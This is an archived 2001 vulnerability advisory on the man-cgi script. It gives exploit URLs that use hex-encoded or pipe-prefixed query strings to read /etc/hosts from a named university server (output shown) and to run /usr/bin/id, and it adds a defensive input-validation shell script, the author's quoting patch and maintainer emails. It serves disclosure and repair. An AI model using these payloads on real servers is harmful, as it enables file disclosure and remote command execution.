
man-cgi.txt

Posted Feb 26, 2001
Authored by Krfinisterre

Man-cgi 1.15 and 2.00 contain remote vulnerabilities which allow any file readable by the web server to be viewed, and some implementations allow remote command execution, because hex-encoded characters in the query string are not filtered. Exploit URLs are included.

tags | exploit, remote, web, cgi, vulnerability
SHA-256 | bde148ba24eeeaed3cbb01ed7b0992252003c4928d9ca6fd786ddf9a3fc401df

While researching several possible CGI-based man holes, I ran across the
following buggy code:

© 1994-1999 Man-cgi 2.00, Panagiotis Christias
<christia@softlab.ntua.gr>

© 1995 Man-cgi 1.15 Modified for Solaris 2.3, David Adams,
<d.j.adams@soton.ac.uk>

© 1994 Man-cgi 1.15, Panagiotis Christias
<christia@theseas.ntua.gr>

© 1996 Man-cgi 1.15 Ported to linux and maintained by, Tom Vrana
<tom@sorry.vse.cz>


The issue is the missing filtering of %20, or any other hex-encoded
character, in the query string: a hex-encoded character followed by a
known file name lets you view that file with the permissions of the web
server. In some implementations it is also possible to specify the path
to a known executable and run it, for example /usr/bin/id. These issues
may be used to disclose sensitive information on your server, or possibly
allow someone to run any command they want on it. If you have further
questions, mail me.

----------------------------------------------------------

http://www.ntua.gr/cgi-bin/man-cgi?%20/etc/hosts%20
reveals the following

#
# Internet host table
#
127.0.0.1 localhost
#147.102.222.210 achilles.noc.ntua.gr achilles
147.102.222.210 achilles.noc.ntua.gr achilles
147.102.222.211 patroklos.noc.ntua.gr patroklos
147.102.222.230 ulysses.noc.ntua.gr ulysses
# Required for backup
147.102.222.250 menelaos.noc.ntua.gr menelaos

-----------------------------------------------------------

http://xxx/cgi-bin/man-cgi?/usr/bin/id
or
http://xxx/cgi-bin/man-cgi?|/usr/bin/id
uid=99(nobody) gid=99(nobody) groups=99(nobody)

-----------------------------------------------------------
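The following is an added example and is not man-cgi's own code (the script's decoder and its command construction are not shown on this page). It demonstrates the input handling the payloads above defeat: a CGI-style decoder that turns %20 and %7C back into the space and pipe characters the script later acts on, followed by a whitelist check that refuses anything which is not a plain page name and section. The function names, the whitelist alphabet, the "page[+section]" parsing and the sample queries are assumptions; the ANY default is taken from the "Try all sections" link in the author's patch below.

```sh
#!/bin/sh
# Added example, not man-cgi's own code. Decodes a CGI QUERY_STRING and
# refuses any page name that must never reach a command line.
# Function names, the whitelist and the sample queries are assumptions.

# Decode %XX escapes (and '+' as a space) one character at a time.
# Returns 1 on a malformed escape so the caller can reject the request.
# A decoded newline is dropped by the command substitution; that is
# acceptable here because such a request is rejected anyway.
urldecode() {
    s=$1
    out=''
    while [ -n "$s" ]; do
        c=${s%"${s#?}"}              # first character of $s
        s=${s#?}                     # drop it
        case $c in
            +) out="$out " ;;
            %) hex=${s%"${s#??}"}    # next two characters
               s=${s#??}
               case $hex in
                   [0-9A-Fa-f][0-9A-Fa-f])
                       out="$out$(printf "\\$(printf '%03o' "0x$hex")")" ;;
                   *) return 1 ;;
               esac ;;
            *) out="$out$c" ;;
        esac
    done
    printf '%s' "$out"
}

# Whitelist: only what a man page name or section can be made of.
# Decoded spaces, '|', ';', '/' and every other metacharacter fail here.
is_safe_token() {
    case $1 in
        ''|*[!A-Za-z0-9_.-]*) return 1 ;;
        *) return 0 ;;
    esac
}

# Parse "page[+section]" from a raw query string (assumed syntax).
# Prints "page section" and returns 0, or prints nothing and returns 1.
# Runs in a subshell so 'set -f' (no globbing of the split words) stays local.
parse_query() (
    set -f
    decoded=$(urldecode "$1") || exit 1
    set -- $decoded                  # deliberate word splitting into page/section
    [ $# -le 2 ] || exit 1
    page=$1
    section=${2:-ANY}                # ANY = "try all sections", as in the author's link
    is_safe_token "$page" || exit 1
    is_safe_token "$section" || exit 1
    printf '%s %s\n' "$page" "$section"
)

# Self-check with constructed queries: two benign requests, the advisory's
# two payloads, and a ';'-based variant.
for q in 'ls+1' 'ls' '%20/etc/hosts%20' '%7C/usr/bin/id' 'ls%3Bid'; do
    if r=$(parse_query "$q"); then
        printf 'ACCEPT %-18s -> %s\n' "$q" "$r"
    else
        printf 'REJECT %s\n' "$q"
    fi
done
```

The decoder is the part that matters for understanding the advisory: the literal `%20/etc/hosts%20` and `|/usr/bin/id` strings are harmless until they are decoded and then handed to a shell or to `man` unvalidated, so the check has to run on the decoded value and before any command is built from it.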

Below are the author's patch and the comments of one of the people who has
modified the script to run on other operating systems.

Sorry for my delayed reply, too much work to do and too much email
to read and reply. Here is a quick fix:

***************
*** 185,191 ****
{ print "<HR align=left width=640 size=2 noshade>"; \
printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
! PAGE=$COMMAND URL=$MANCGI

fi;

---- 178,184 ----
{ print "<HR align=left width=640 size=2 noshade>"; \
printf("<B>NOTE:</b> man page for %s may be in the wrong place.
\n",PAGE); \
printf("<A HREF=\"%s?%s+ANY\">Try all sections and all optional
pages</a>\n",URL,PAGE); } }' \
! PAGE="$COMMAND" URL="$MANCGI"

fi;
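Review bot: quoting `PAGE="$COMMAND"` and `URL="$MANCGI"` only hardens this one awk invocation; `$COMMAND` still carries whatever the query string decoded to, and the `%20/etc/hosts%20` and `|/usr/bin/id` payloads shown in the advisory take effect wherever the script uses `$COMMAND` to build the command it runs, none of which is in this hunk. Reject the value before any command sees it, for example `case "$COMMAND" in ''|*[!A-Za-z0-9_.-]*) exit 1 ;; esac` near the top of the script (after splitting off the section, if the script accepts one), and quote every other `$COMMAND` expansion as well.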

The values of the PAGE and URL variables should be quoted. This is the
first step. I should correct several other parts of the script. I was
quite naive when I wrote man-cgi several years ago :)

You're welcome to test the security of http://www.ntua.gr/cgi-bin/man-cgi

Regards,
Panagiotis
--
Panagiotis J. Christias Network Management Center
P.Christias@noc.ntua.gr National Technical Univ. of Athens, GREECE

----------------------------------------------------------------

On Thu, Feb 22, 2001 at 10:52:41AM -0000, David Adams wrote:
Sorry to be so dim, but I really could not fathom the point you were
trying to make with your first email. Only now do I understand the
significance of putting in the %20 (space character). I still don't
understand your anonymity, but I guess I can live with it.
The man-cgi script was written by Panagiotis Christias, and I made some
enhancements and got it working for Solaris. It works so well that no one
(AFAIK) has bothered to re-write it for Perl.

I am grateful that you have pointed out this security loophole to us.
It is up to you whether you report it through the normal channels or not.
As it can be used to read the /etc/passwd file it could be a real
security threat. I will look at the script and see if I can find a
solution, I hope Panagiotis will do the same.

--
David Adams
Computing Services
Southampton University

